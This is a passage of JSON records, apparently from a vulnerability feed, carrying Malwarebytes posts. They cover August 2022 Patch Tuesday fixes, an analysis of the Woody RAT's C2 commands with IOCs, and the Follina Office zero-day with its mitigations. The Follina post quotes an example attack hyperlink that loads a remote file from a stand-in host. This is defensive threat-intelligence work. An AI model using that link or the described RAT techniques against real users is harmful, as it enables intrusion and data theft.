["CVE-2022-30190"], "modified": "2022-06-15T10:13:53", "id": "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "href": "https://www.hivepro.com/follina-new-unpatched-zero-day-vulnerability-in-microsoft-office/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-08-12T02:01:33", "description": "[Microsoft has published](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) fixes for 141 separate vulnerabilities in its batch of August updates, fixing a total of 118 CVEs in multiple products. This is a new monthly record if you look at the CVE count.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that jumped out at us.\n\n## Microsoft Support Diagnostics Tool\n\n[CVE-2022-34713](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34713>): is a Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) vulnerability. This is a known to be exploited vulnerability which requires the target to open a specially crafted file. This CVE is a variant of the vulnerability publicly known as [Dogwalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>).\n\n[CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>): is another MSDT RCE vulnerability. Neither technical details nor an exploit are publicly available, but we do know that user interaction is required and the attack vector is local, so this is very likely another case where a specially crafted file needs to be opened by the victim.\n\n## Microsoft Exchange\n\n[CVE-2022-30134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30134>): is a Microsoft Exchange Information Disclosure vulnerability. This vulnerability is publicly disclosed but has not yet been detected in attacks. Affected products are Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, Microsoft Exchange Server 2013 CU 23, Microsoft Exchange Server 2016 CU 23, and Microsoft Exchange Server 2019 CU 12. Users vulnerable to this issue would need to enable Extended Protection in order to prevent exploitation of this vulnerability. More details can be found on the [Exchange Team Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[CVE-2022-24477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24477>): is a Microsoft Exchange Server Elevation of Privilege (EoP) vulnerability. Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, and Microsoft Exchange Server 2013 CU 23. Users vulnerable to this issue would need to enable Extended Protection in order to prevent exploitation of this vulnerability. More details can be found on the [Exchange Team Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[CVE-2022-24516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24516>): is another a Microsoft Exchange Server EoP vulnerability. Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2013 CU 23, Microsoft Exchange Server 2019 CU 11, and Microsoft Exchange Server 2016 CU 22. Users vulnerable to this issue would need to enable Extended Protection in order to prevent exploitation of this vulnerability. More details can be found on the [Exchange Team Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n## Windows Point-to-Point Protocol\n\n[CVE-2022-30133](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30133>): is a Windows Point-to-Point Protocol (PPP) RCE vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.8 out of 10. An unauthenticated attacker could send a specially crafted connection request to a remote access server (RAS) server, which could lead to remote code execution (RCE) on the RAS server machine. This vulnerability can only be exploited by communicating via port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port thus rendering the vulnerability unexploitable.\n\n## Windows Network File System\n\n[CVE-2022-34715](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34715>): is a Windows Network File System (NFS) RCE vulnerability with a CVSS score of 9.8 out of 10. This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). This vulnerability is not exploitable in NFSV2.0 or NFSV3.0. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV4.1. This could adversely affect your ecosystem and should only be used as a temporary mitigation.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\n**Adobe** has also released security updates for many of its products, including Acrobat, Reader, Adobe Commerce, and Magento Open Source. More details [on the Adobe security site](<https://helpx.adobe.com/security.html>).\n\n**Cisco** released security updates for [numerous products](<https://tools.cisco.com/security/center/publicationListing.x>) this month.\n\n**Google** released [Android](<https://source.android.com/security/bulletin/2022-08-01>) security updates.\n\n**SAP **released 5 new [Security Notes](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>).\n\n**VMware **released Security Advisory [VMSA-2022-0022](<https://www.vmware.com/security/advisories/VMSA-2022-0022.html>) and [warned](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html#:~:text=2022%2D08%2D09%3A%20VMSA%2D2022%2D0021.1>) that a recently disclosed auth bypass flaw is [now actively exploited](<https://www.bleepingcomputer.com/news/security/vmware-warns-of-public-exploit-for-critical-auth-bypass-vulnerability/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T09:00:00", "type": "malwarebytes", "title": "Update now! Microsoft fixes two zero-days in August's Patch Tuesday", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-24477", "CVE-2022-24516", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35743"], "modified": "2022-08-10T09:00:00", "id": "MALWAREBYTES:1E762A45A948B3FD9F8A8DC65D028095", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-patch-tuesday-august-2022", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-08T14:51:13", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods\n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure1.png>) Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called \"_Information security memo_\" which provide security practices for passwords, confidential information, etc.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure2.png>) Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure3.png>) Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure4.png>) main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.\n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure5.png>) get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure6.png>) RSA Encryption routine\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure7.png>) AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** \\- This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure8.png>) knock request headers\n\n**submit **\\- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. [Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** \\- The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with \"_CRY\" then the malware proceeds to send the knock request again but if the C2 responds with \"_ACK\" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure9.png>) Command execution routine\n\n**_SET Commands**\n\n * **PING** \\- This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** \\- Unknown command\n * **EXIT** \\- Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then \"_DAT\" is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure10.png>) EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file.\n * **INFO** (Submit Information) - The INFO command is similar to the \"submit\" request above; this command sends the exact information to the C2 as sent by the \"submit\" request.\n\n INFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are: \n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure12.png>) INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure13.png>) SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character.\n * **DN_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure14.png>) Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.\n\n\n\n## IOCs\n\n**Woody****Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:00:00", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:00:00", "id": "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "href": "https://www.malwarebytes.com/blog/news/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "_**Update: Please see our [FAQ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) for the latest guidance and mitigation tips on Follina.**_\n\nOn Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.\n\nThe [mitigation](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) offered by Microsoft consists of an alternative method to unregister the MSDT URL Protocol. \nSeveral researchers have come across a novel attack that circumvents Microsoft's Protected View and anti-malware detection.\n\nThe attack vector uses the Word remote template feature to retrieve an HTML file from a remote webserver. It goes on to use the `ms-msdt` protocol URI scheme to load some code, and then execute some PowerShell.\n\nAll of the above methods are features, but if we tell you that put together this allows an attacker to remotely run code on your system by tricking you into clicking a link, that sounds quite disturbing doesn\u2019t it?\n\nWell, you'd be right to be concerned. That little sequence of features adds up to a zero-day flaw in Microsoft Office that is being abused in the wild to achieve arbitrary code execution on Windows systems. \n\nJerome Segura, Malwarebytes' Senior Director, Threat Intelligence:\n\n> This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros.\n\nThe most prominent researchers working on the issue have dubbed the vulnerability in Microsoft Office **Follina**, because a sample uploaded to VirusTotal included the area code for the Italian comune Follina.\n\nThe first researcher to find and report Follina used in the wild goes by the handle [@CrazymanArmy](<https://twitter.com/CrazymanArmy/status/1531120929321152512?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>). Our own analyst Hossein Jazi had also spotted the same maldoc, although at the time the remote template was down, leaving out a critical piece of the attack chain.\n\n> Our threat intel analyst [@h2jazi](<https://twitter.com/h2jazi?ref_src=twsrc%5Etfw>) had spotted a sample using the msdt.exe RCE back in April. \n \nAt the time, the remote template was already down and therefore full identification was not possible. <https://t.co/03UU2ClMhv>\n> \n> -- Malwarebytes Threat Intelligence (@MBThreatIntel) [May 30, 2022](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw>)\n\nIt was more recently made public again by [@nao_sec](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>).\n\n> Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.<https://t.co/hTdAfHOUx3> [pic.twitter.com/rVSb02ZTwt](<https://t.co/rVSb02ZTwt>)\n> \n> -- nao_sec (@nao_sec) [May 27, 2022](<https://twitter.com/nao_sec/status/1530196847679401984?ref_src=twsrc%5Etfw>)\n\n## Affected versions\n\nUnder normal circumstances, files from potentially unsafe locations are opened as read only or in Protected View. However, this warning can be easily bypassed by changing the document to a Rich Text Format (RTF) file. By doing so, the code can run without even opening the document via the preview tab in Explorer.\n\nWhile the research is ongoing and the info security community is testing and probing, we are receiving some mixed signals whether the latest, fully patched, version of Office 365 is vulnerable to this type of attack or not. Older versions are certainly vulnerable, which already makes it a problem with a huge attack surface.\n\nResearcher Kevin Beaumont [provides the example](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) where an attacker can send an email with this text as a hyperlink:\n \n \n ms-excel:ofv|u|https://blah.com/poc.xls\n\nAnd Outlook will allow the user to click the hyperlink and open the Excel document. Because the document isn\u2019t attached to the email, and the URI doesn\u2019t start with http or https, most email gateways are going to let that slide straight through as nothing appears malicious.\n\nAs we stated earlier, even looking at a specially crafted file in the preview pane of Windows Explorer could trigger the attack. Microsoft has been made aware of the issues and the possible consequences. While its first reaction was that there was no security issue, it seems this needs to be fixed.\n\n## Mitigation\n\nThere are a few things you can do to stop some or all of the \u201cfeatures\u201d used in this type of attack.\n\n### Unregister the ms-msdt protocol\n\nWill Dormann, a vulnerability analyst at the CERT/CC has [published a registry fix](<https://gist.github.com/wdormann/031962b9d388c90a518d2551be58ead7>) that will unregister the ms-msdt protocol.\n\nCopy and paste the text into a notepad document:\n\n * Click on **File**, then **Save As\u2026**\n * Save it to your Desktop, then name the file `disable_ms-msdt.reg` in the file name box.\n * Click **Save**, and close the notepad document.\n * Double-click the file `disable_ms-msdt.reg` on your desktop.\n\nNote, if you are prompted by User Account Control, select **Yes** or **Allow** so the fix can continue.\n\n * A message will appear about adding information into the registry, click **Yes** when prompted\n * A prompt should appear that the information was added successfully\n\n### Disable preview in Windows Explorer\n\nIf you have the preview pane enabled, you can:\n\n * Open File Explorer.\n * Click on **View** Tab.\n * Click on **Preview Pane** to hide it.\n\nThe post [Microsoft Office zero-day "Follina"\u2014it\u2019s not a bug, it\u2019s a feature! (It's a bug)](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:09:26", "type": "malwarebytes", "title": "Microsoft Office zero-day \u201cFollina\u201d\u2014it\u2019s not a bug, it\u2019s a feature! (It\u2019s a bug)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T18:09:26", "id": "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) for a zero-day remote code vulnerability, 'Follina', already being exploited in the wild via malicious Word documents.\n\n_**Q: What exactly is Follina?**_\n\nA: Follina is the nickname given to a new vulnerability discovered as a zero-day and identified as CVE-2022-30190. In technical terms it is a Remote Code Execution Vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).\n\n_**Q: But what does it mean, and is this a serious vulnerability?**_\n\nA: An attacker can send you a malicious Office document that will compromise your machine with malware when you open it. It is serious since it is already actively being exploited in the wild and doesn't require users to enable macros.\n\n**_Q: What is Microsoft doing about it?_**\n\nA: Microsoft has offered [mitigation steps](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) that disable the MSDT URL Protocol. However, users should proceed with caution because of possible conflicts and crashes with existing applications.\n\n_**Q: Does Malwarebytes protect against Follina?**_\n\nA: Yes, it does. Please see additional steps below based on your product to ensure you are protected.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Follina_block.png> \"\" )\n\n## How to add protection with Malwarebytes\n\nWe are working on releasing a new version of Anti-Exploit that won't require adding new shields and will provide more holistic protection. For immediate mitigation, please follow the instructions below.\n\n### Malwarebytes Premium (Consumer)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/MB4.gif> \"\" )\n\n### Malwarebytes Nebula (Enterprise)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Nebula.gif> \"\" )\n\nThe post [FAQ: Mitigating Microsoft Office's 'Follina' zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T16:36:44", "type": "malwarebytes", "title": "FAQ: Mitigating Microsoft Office\u2019s \u2018Follina\u2019 zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T16:36:44", "id": 